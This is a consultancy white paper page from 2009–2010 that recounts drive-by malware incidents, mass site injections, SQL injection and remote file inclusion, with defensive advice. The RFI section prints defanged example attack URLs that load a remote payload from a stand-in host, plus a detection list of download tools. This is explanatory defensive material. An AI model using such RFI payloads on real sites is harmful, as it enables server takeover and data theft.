The "No Network is 100% Secure" series
- High Value Site Hacks, 2010 edition -
- In the news -
A White Paper
All rights reserved - may not be copied without permission
Easyrider LAN Pro, NOC Design Consultants
Contact Us
![]()
Vulnerability test: There is no malware on this page.  However, if you 
received three pop-up messages, your computer is vulnerable to java injection 
drive-by exploitation.  You might want to look into installing a safer browser!
If you did not receive three pop-up java alert messages when 
you entered this page, that's a good sign that your browser is safe! Click on 
the "How vulnerable am I?" button above to run one more (completely safe) test. 
If a new window does NOT open, you are about as safe as you can be, at least until 
these hackers come up with some new exploit. Note that you still need to have ALL 
of your software (not just the operating system) patched to the latest level 
since there are lots of other ways to pick up trojans and viruses besides visiting 
a compromised, infected drive-by web site.
A recent study revealed that the average PC in the USA (including computers in a 
corporate environment) have over a dozen current vulnerabilities.  And remember, 
these hackers only have to exploit one vulnerability and you're hacked! The same 
study confirmed that there is an over-dependance on anti-virus software to keep 
computers safe. This is an absolute fallacy!  AV software is a 1999 solution to a 
2009 problem. The drive-by attacks described in this white paper go largely 
unnoticed by AV software.  If your computer failed any of our vulnerability 
tests, it's just a matter of when, not if, you get hacked.
Feedback: We value the opinion of IT professionals.  If you have comments 
about this series of white papers (too detailed, not detailed enough, helful, 
boring, or whatever) we would appreciate hearing from you.  The information 
contained in these white papers is intended to help IT Managers better 
secure their networks.  The more on-point our white papers are, the more useful 
the information will be to our target audience.  Thanks in advance!
Summary: A great many computer users pay little attention to the security 
issues listed here.  This is largely due to an [unfounded] reliance that they are 
safe because they have a firewall and anti virus software installed.  The fact is 
that the majority of the exploits mentioned here go largely unnoticed by firewalls 
and AV software, which is why there are many millions of PCs currently infected and 
functioning as bots for the criminal network.  And if that wasn't bad enough, there 
are some 60,000 legitimate web sites currently under the control of criminal 
hackers with more added every day.  If you provide any personal information on any 
of these sites, you are just asking to have your identity stolen.  Or worse. So any 
time any web site requires that you create an account, *ALWAYS* use a throw-away 
e-mail address and a throw-away password. Never, ever use a password that  you also use 
in any account that you don't want hacked.  And if a web site wants your social security 
number, drivers license number, mother's maiden name or anything that is frankly 
none of their business, dump your browser session immediately. These sites are either 
hacked or are operated by morons.  In either case, a hasty exit is in order. There's more 
hacking information here.
Directshow vulnerability: This will likely become a popular form of exploit. 
The DirectShow vulnerability is interesting for a number of reasons.  Some of the 
first pages to use this exploit in the wild were linked from phishing pages. The 
phishing pages not only attempt to steal the visitors' login credentials, but also 
silently redirected users to a malicious Web page hosting an exploit for the 
DirectShow vulnerability (CVE-2009-1537). This malicious Web page loads a 
corrupt .avi file that exploits the vulnerability and also loads some additional 
malicious .dlls to facilitate reliable exploitation of the user's machine as a bot.
The malicious .dlls in turn download an encoded .exe payload that leads to 
Trojan.Cipevas being loaded on to the victim's machine. Trojan.Cipevas then connects 
back to the attackers' website and waits for further commands from the attacker. 
The phishing component of this exploit is a fake Windows Live login screen. There is 
currently (as of 6-19-09) no patch for the Directshow vulnerability.
Details: The vulnerability exists in the code within Microsoft DirectX and can be 
triggered by a specially crafted QuickTime media file. The attackers Web page will 
try to play the malicious QuickTime file, not using the QuickTime player, but using 
Windows Media Player instead. This will trigger the vulnerability and allow the 
attacker to execute code on the visitor's computer. The vulnerable code exists in 
quartz.dll. This vulnerability does not exist in Vista or Windows Server 2008. 
Yet another java script injection exploit: June 22, 2009.  The official Web 
site of the Ethiopian Embassy in Washington, D.C., has been compromised with malicious 
code. The Web site has been injected with obfuscated JavaScript (the code is in an 
Iframe). The code redirects users to sites that deliver malicious software that is 
installed without needing any explicit user interaction. If your computer failed 
the vulnerability tests on this page, your computer would likely be automatically 
infected simply by visiting any one of the estimated 80,000 legitimate web sites like 
this embassy site which have been compromised by hackers.
Nine-ball mass injection attack: Discovered on 6/03/2009. To date, over 
40,000 legitimate Web sites have been compromised with obfuscated code that leads to 
a multi-level redirection attack, ending in a series of drive-by exploits that if 
successful install a trojan downloader on the user's machine.
The obfuscation code injected into these legitimate Web sites is somewhat random, but 
the deobfuscation algorithm is consistant amongst all the infections. The algorithm 
uses the JavaScript method "String.fromCharCode" to convert a chunk of decimal values 
to a string. The string obtained after deobfuscation is an iframe that eventually 
leads to an exploit site. After redirection, the exploit payload site returns highly 
obfuscated malicious code. The malicious code attempts to exploit MS06-014 (targeting 
MDAC) and CVE-2006-5820 (targeting AOL SuperBuddy), as well as employing exploits 
targeting Acrobat Reader and QuickTime. The MS06-014 exploit code will download a 
Trojan dropper with low AV detection rate. This dropper drops a dll with the name 
SOCKET2.DLL to Windows' system folder. This file is used to steal user information. 
The malicious PDF file, served by the exploit site, also has very low AV detection 
rate. This exploit is also known as ninetoraq
How embarassing!: EWeek.com, a technology news site owned by Ziff Davis 
Enterprise, in February, 2009 displayed an ad on its homepage masquerading as a 
promotion for Lacoste, the shirt maker.  The retailer hadn't placed the ad -- a hacker 
had, to direct users to a Web site where harmful programs would be downloaded to 
their computers, says Stephen Wellman, director of community and content for Ziff 
Davis. Viruses can be incorporated directly within an ad, so that simply clicking on 
the ad or visiting the site can infect a computer, or ads can be used to direct users 
to a nefarious Web site that aims to steal passwords or identities.
The Web site of Fort William Mountain Bike World Cup 2009 :has been hijacked 
by attackers, and redirects users to rogue AV sites if they visit the site through 
well-known search engines such as Google, Yahoo, and MSN. June 24, 2009. 
This site has been injected by the Nine-Ball malicious code twice this month. Now, 
the injected code has been cleaned but system control has been lost without the 
administrator's knowledge. Once the attackers gained system control, they likely 
made small changes to the configuration of the Web server to redirect any visitors 
to rogue AV Web sites if arriving at the site via search engines. This is a clear 
reminder to  Web masters that a full examination of the whole system is necessary 
after removing code injections. 
British Government sites and schools hacked: London, June 15, 2009. Hackers 
have taken over hundreds of government, school and university websites in Britain, 
which direct users to pornographic websites. All the websites 
were affected in different ways. Some contained inappropriate links on their home pages 
and others contained drive-by malware.  The hackers were apparently motivated by the 
money they could earn from porn sites by boosting their traffic.  The compromised web 
sites also direct people to criminal web sites that sell products such as Viagra and 
hardcore pornography. These sites will attempt to install viruses or malware on 
people's computers for identity theft and various other purposes.  It is possible 
to see which sites have been hacked by typing into Google's search engine, 
"inurl:ac.uk", in order to limit the search to British education websites and then 
adding a phrase such as "buy viagra". 
Beladen massive injection infections:  June 11, 2009.  The number of web sites 
infected with malicious code inserted by the Beladen massive injection is now 
estimated to be around 20,000 worldwide. The attackers who have taken control of 
these legitimate business web sites are expected to upgrade their attack 
drive-by malware very soon.  However at this time, antivirus detection of the 
existing malware is said to be low. If any of your users have visited any of these 
sites, it is quite likely that your entire network is infected and you don't even 
know it.
Canadian MSN Sympatico web site : has been compromised with malicious code on 
June 10, 2009. The site's home page, index.php, was compromised and infected with an 
obfuscated JavaScript iframe redirect to a known server of malware with an explicit 
domain name.
Twitter:  June 3, 2009.  In our opinion, subscribing to social networking 
sites such as Twitter is just asking for trouble.  There are too many and too frequent 
hacks, cracks and phishing goings-on there for any sane person to want to be part of it. 
To list all of them would take up pages and pages of HTML, so suffice it to post 
this: The latest malware attack on the social network links to a video hosted 
on a site that installs scareware as victims watch the video. Duh....  if you liked 
Kazaa's malware, you'll love Twitter.
June 18, 2009: We're seeing a wave of fake Twitter invitations that come carrying a 
mass-mailing worm. The observed messages appear as if they have been sent from a 
Twitter account; however, unlike a legitimate Twitter message, there is no invitation 
URL present in the body. Instead, the user will see an attachment that appears as 
a .zip file that purportedly contains an invitation card.  Invitation Card.zip is the 
name of the malicious attachment, and it is being identified as W32.Ackantta.B@mm, 
which was first discovered in an e-card virus attack in February, 2009. 
W32.Ackantta.B@mm is a mass-mailing worm that gathers email addresses from the 
compromised computer and spreads by copying itself to removable drives and shared 
folders.
Most companies restrict the personal use of company computers. Others  
have policies that totally forbid personal computing on company time using company 
equipment.  Accessing Twitter, Facebook, Instant Messaging (IM) and so on 
could be grounds for termination.  And if your work PC gets infected because 
you visited Twitter and the infection spreads throughout your company...  well... 
you can probably kiss your job good-bye. Any good IT guy will be able to trace 
a virus back to it's source so you really need to think about how important your 
paycheck is to you before you go places that you shouldn't.
U.S. Army: May 30, 2009. An anti-American group of hackers have broken into 
at least two of the US Army's critical web servers.  This despite the advanced 
security and antivirus software the Defense department's has in place. The group, 
based in Turkey, call themselves the "m0sted", They broke into servers at the Army's 
McAlester Ammunition Plant in McAlester, Oklahoma on January 26, 2009 and previously 
at the US Army Corps of Engineers' Transatlantic Center in Winchester, Virginia on 
September 19, 2007. In the case of the McAlester Ammunitions plant breach, visitors 
who were trying to access the plant's website found themselves redirected to a page 
that featured a m0sted-led protest against climate change.  In the Army Corps of 
Engineers' attack, the hackers sent website vistorsto www.m0sted.net, which at the 
time contained anti-American and anti-Israeli messages and images. It is still not 
clear as to whether the hackers managed to steal any sensitive data from the Army's 
servers. According to officials, the hackers broke into the web servers by using an 
SQL injection where they successfully exploited a security vulnerability in 
Microsoft's SQL Server database.  In the past, the same hackers performed similar 
attacks on many other websites, including an attack in July 2008 against a site 
operated by international computer security firm Kaspersky Lab.
The website of the Communist Party Of Britain:  has been infected with 
malicious code. June 6, 2009.  Infection by the iFrame-F script coincided with local 
and European election in the UK, marking a time when the minority party website 
would have had far more visitors than normal. The affected file on the website is 
associated with serving up Microsoft Silverlight script, suggesting an important 
part of the site's multimedia environment was affected by the security breach. 
The malicious code (inserted in a file called silverlight.js) serves up an iFrame 
that points to a malicious Google-spoofing website in China.  The Communist Party's 
website infection is invisible to the naked eye. But buried inside the code of a 
plugin for these malicious webpages. The code is designed to deliver funky animation 
and video effects to website visitors - but actually tries to invisibly download 
malicious code from web servers based in China and Russia." 
More embarrassment - another computer expert hacked!:  June 25, 2009. 
ZDNet's own Ryan Naraine reports in his Zero Day security blog that Mac evangelist 
Guy Kawasaki's Twitter account was hijacked yesterday and was used in an attempt to 
distribute malware to his almost 140,000 followers.  The attack included a link to 
what purported to be a "sex tape video free download" linked to Gossip Girls star 
Leighton Meester.  But, after a series of clicks, the end result was a malicious Trojan. 
The payload at the end of the mal-Tweet was especially dangerous to both PCs and Macs. 
In this case, the link would lead to a malicious website designed to infect both Macs 
and PCs with a DNS changing Trojan which at the time of writing has low-to non-existent 
detection rates by security vendors.  Luckily, the offending tweet reeked so badly of 
SPAM that it probably limited the scope of its damage.  If the hacker was a little more 
nefarious and used the account to Tweet things in a more Kawasaki-like way, 
i.e. "7 Sneaky (and useful) ways to use Twitter search" the damage could have been 
much more extensive. In fact, Kawasaki's use of team-Twittering could have allowed a 
rogue Tweeter to fly under the radar for quite a while.  Now would probably be a good 
time to change your Twitter password, just in case.
Remote File Inclusion (RFI) attacks: 
One of the potentially most dangerous emerging security threats to the Internet isn't 
even showing up on antivirus radar.  Currently, an estimated 52,000 Websites are 
infected with at least one exploit by RFI in a blended attack, and there are many more 
that remain uncounted. None are being picked up by Google's Safe Browsing checks or 
McAfee's Site Advisor, and only one of the top 40 antivirus vendors shows even a 
potential problem.  RFI is a hacking technique that allows attackers to remotely run 
PHP code on victims' Websites. It is based on exploitation of vulnerabilities within 
Web applications.  RFI attacks are difficult to trace. The files are not usually tagged 
as malware because they do not modify system files, registry keys, etc. They typically 
target only Unix-based Web servers and use normal PHP or Unix commands. They do not 
usually deploy things like malware packers, which makes them difficult to track by 
antivirus vendors that rely on packers to find hostile code.
Also, the presence of an RFI identification file that has been maliciously added or 
injected into a Website does not necessarily indicate a successful attack. It simply 
indicates an attempt. But that attempt could be a major disaster waiting to happen, one 
that could unravel a company's business.
RFI is historically used by hackers for defacing purposes. However, by loading their 
shell onto a Web server hacked via RFI vulnerability hackers can also gain access to 
customer data stored on the server.  In blended attacks, RFI can be combined with a 
XSA (Cross-Server Attack) to harm or even hijack a Web server. This whole area becomes 
really dangerous to Web security, since attackers could use RFI as a botnet builder, 
turning the Web server into a powerful DDoS (distributed denial of service) tool. 
RFI Web server attacks also employ a type of "downloader" much like Windows malware, 
which comprises a list of Unix commands that download additional bot code when executed. 
Downloaders can be detected by writing a script/signature that looks for the presence 
of the commands wget, curl, lwp-download, fetch, and get.  Webmasters also need to 
check that they are using the latest software versions and look for malicious redirects 
within their Websites. A simple check is the obvious "txt?" since many RFI exploits end 
with a question mark.  Internet surfers should avoid clicking on oddball URLs 
featuring .txt files. (Remember, such URLS can easily be masked with a "click here.") 
Check out the following examples of URLs containing code to attack a Website:
hxxp://badware.com/shop/FX29ID.txt
hxxp://info.mywebsite.com/index.php?page=hxxp://rfi.badware.com/pawned/FX29ID.txt?
Again, note that such redirects can also be masked and inadvertently clicked on in 
spam or from a compromised Website ad.
![]()
About the Author
Frank Saxton is a computer network security engineer and Easyrider LAN Pro principle.
Home-based in Portland, Oregon, Frank has been designing remote diagnostic and
network enterprise monitoring centers since the late 1970s.  Prior to becoming a
professional systems engineering consultant in 1990, Frank had a 20 year career
in computer systems field engineering and field engineering management. Frank
has a BSEE from Northeastern University and holds several certifications including
Network General's Certified Network Expert (CNX). As a NOC design engineer and
architect, Frank works regularly with enterprise-class monitoring tools such as
HP Openview Operations, BMC Patrol and others. In his enterprise security
audit work, Frank uses sniffers and other professional grade monitoring tools on a 
daily basis.
![]()
Next in the security white paper series: 
How Cyber Criminals will mature over the next ten years
More 2009 High profile hacks in the news
Still more 2009 hacks in the news
Firewall White Paper
Are you vulnerable to drive-by exploits?
IT employment challenges of the 21st century
Employment reference checking white paper
Competency Certifications White Paper
ISO/IEC 27005:2008 Standard for Security Risk Management
Password White Paper
Digital Identification Certificates White Paper
Virus White Paper
Ghostnet White Paper
Cryptography White Paper
OpenID White Paper
Intrusion Detection Systems IDS White Paper
Rootkit White Paper
Unnecessary Windows XP Services White Paper
Scareware White Paper
Exaflood Internet Brownout White Paper
Cloud Computing White Paper
Proxy Server White Paper
Personal Computer PC Security White Paper
Phishing White Paper
DNS Poisoning White Paper
Conficker White Paper
SPAM White Paper
Best Practices White Paper
Denial of Service DoS White Paper
Trojan Virus Attacks White Paper
Port Scanning White Paper
Monitoring Basics 101 White Paper
Monitoring Basics 102 White Paper
Monitoring Basics 103 White Paper
Virtual Machine Security White Paper
Aurora vulnerability White Paper
Shelfware White Paper
Outsourcing White Paper
Easyrider LAN Pro Consulting services:
Network Security Audit and PC Tune-up service
Portland, Oregon Network Security Consulting
- Proxy server installation and configuration
- Enterprise security consultations
- Disaster recovery planning
- Disaster recovery services
- Capacity, migration and upgrade planning
- Build and deploy central syslog server
- Build trouble ticket systems
- Design and build monitoring environments
- Design and build Network Operations Centers (NOC)
- HP Openview, BMC Patrol consulting
Last modified January 10, 2010
Copyright 1990-2010 Easyrider LAN Pro